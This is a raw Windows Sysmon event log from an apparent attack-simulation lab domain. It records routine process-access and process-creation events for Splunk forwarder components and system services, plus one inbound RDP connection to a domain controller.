08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F74C-60EB-C079-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.365{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74C-60EB-C079-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:24.350{0C1E0330-F74C-60EB-C079-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001053067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:15.666{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-57808-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x8000000000000000809584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.865{0C1E0330-F74D-60EB-C279-00000000D001}6321128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.740{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D07D7D01CCC51D5ABB219810288CED,SHA256=19A0EBBA13C3516CAC4E9A816BD63B77CE29F3DA2C3A5F8AF99852A76AF7F067,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.740{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74D-60EB-C279-00000000D001}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.740{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.740{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F74D-60EB-C279-00000000D001}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74D-60EB-C279-00000000D001}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.725{0C1E0330-F74D-60EB-C279-00000000D001}632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:25.335{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A88AE20C3D70EA127759B92FFB2601AA,SHA256=9EB81DAE608C4E6A58EB3927AA5FB41304401CFAEEAAC7D049C423F2B9466E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.584{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D45A80A6917A45AAEEBFDE90DAC48B6D,SHA256=52FF31AB076F420C1CAE65BB1CAD9EED00109EF4840FBC14F2663868B9E21254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.584{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BBFB089F7FA3D5EA09BAC4C6149D5C7,SHA256=576192195BB6402DC06C9DDA0B76A8268A3506E6BD7F85616B1C17197A825640,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74D-60EB-C179-00000000D001}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 